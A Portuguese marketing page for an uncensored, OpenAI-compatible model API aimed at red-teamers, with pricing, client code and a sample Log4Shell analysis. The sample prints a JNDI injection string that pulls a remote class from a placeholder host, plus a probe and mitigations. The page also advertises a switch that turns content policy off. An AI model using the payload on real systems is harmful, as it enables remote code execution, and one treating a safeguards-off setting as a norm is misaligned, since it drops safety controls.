Os modelos convencionais respondem com um bipe. A gente tira.
Uma API compatível com a OpenAI, feita para desenvolvedores, com modelos sem restrições — para red-teaming, avaliação de jailbreak, pesquisa de segurança e tudo que não pode entregar uma recusa falsa.
Nomeados pelo que fazem, não pelo modelo open-weight por baixo — assim podemos melhorar os pesos sem nunca quebrar o seu código.
O padrão. Janela de 256K tokens, sem censura — o cavalo de batalha do dia a dia para red-teaming, avaliações e pesquisa.
O nível de fronteira. Contexto de 1M tokens para os maiores trabalhos — bases de código inteiras, transcrições longas, análise profunda de vários documentos.
A opção barata e rápida. Custo menor por token para tráfego de alto volume e chamadas mais simples.
Uma sessão de red-team sobre o Log4Shell — causa raiz, uma verificação segura em laboratório e a correção. Sem sermões, sem recusas; só a análise.
CVE-2021-44228 (Log4Shell). Causa raiz, e como o lookup JNDI vira RCE.${…} dentro das strings que registra em log. Um valor logado como ${jndi:ldap://host/x} faz a JVM resolver esse nome via LDAP/RMI, buscar uma classe Java remota e instanciá-la — código arbitrário roda no processo de logging. A superfície de ataque é qualquer coisa que chegue a uma chamada de log: User-Agent, cabeçalhos, campos de formulário. Faixa afetada: 2.0-beta9 → 2.14.1.${jndi:ldap://<token>.your-collab/x} em um cabeçalho que você sabe que é logado.<token> significa que a string foi interpolada → vulnerável. Nada é servido, então nada executa.JndiLookup.class e compare as versões com a faixa afetada.2.17.1+. Ainda não dá? Defina log4j2.formatMsgNoLookups=true (2.10+) ou remova JndiLookup.class do classpath, adicione uma regra de WAF para ${jndi: e filtre o LDAP/RMI de saída do host.A API é drop-in, compatível com a OpenAI. Troque a URL base e a chave — seu código, SDKs e ferramentas atuais continuam funcionando.
from openai import OpenAI
client = OpenAI(
base_url="https://unbleep.ai/v1", # ← the only change
api_key="ub_live_9f2c…",
)
stream = client.chat.completions.create(
model="unbleep",
messages=[{"role": "user", "content": "…"}],
stream=True,
)
for chunk in stream:
print(chunk.choices[0].delta.content or "", end="")
import OpenAI from "openai";
const client = new OpenAI({
baseURL: "https://unbleep.ai/v1", // ← the only change
apiKey: "ub_live_9f2c…",
});
const stream = await client.chat.completions.create({
model: "unbleep",
messages: [{ role: "user", content: "…" }],
stream: true,
});
for await (const chunk of stream)
process.stdout.write(chunk.choices[0].delta.content ?? "");
curl https://unbleep.ai/v1/chat/completions \
-H "Authorization: Bearer ub_live_9f2c…" \
-H "Content-Type: application/json" \
-d '{
"model": "unbleep",
"messages": [{"role":"user","content":"…"}],
"stream": true,
"policy": "off"
}'
OpenAI Python, Node e qualquer ferramenta que fale a API Chat Completions. Nada novo para aprender.
text/event-stream de chunks delta, encerrado por [DONE] — exatamente o que o seu cliente já interpreta.
Envie "policy": "research" para marcar uma requisição no seu histórico de uso, ou "strict" para aplicar uma lista de bloqueio, quando um projeto precisar.
Compre crédito quando precisar, ou coloque em um plano mensal e deixe ele chegar sozinho. Cada requisição é cobrada pelos tokens que realmente consumiu, à tarifa por milhão publicada para o modelo chamado.
unbleep $3.00 entrada / $3.00 saída
unbleep-high $5.00 / $5.00
unbleep-mini $1.00 / $1.00
por 1M tokens
Adicione crédito com cartão quando precisar, ou deixe um plano entregar todo mês. Ele não expira enquanto sua conta estiver aberta, e crédito não usado é reembolsável em até 14 dias.
Reservamos uma estimativa quando a requisição começa e acertamos pelo custo real em tokens quando ela termina. Uma requisição que dá erro é liberada, nunca cobrada.
Uma requisição é recusada quando seu saldo não cobre — nunca concedemos crédito nem cobramos depois. Saldo e gasto em tokens ficam no console.
O unbleep é para equipes de segurança, pesquisadores e criadores que precisam de uma linha de base sem filtro. Retenção zero por padrão, um seletor de política de primeira classe, histórico de uso e custo por requisição no console, e uma política de uso aceitável de verdade. Sem censura é uma capacidade — você decide como ela é governada.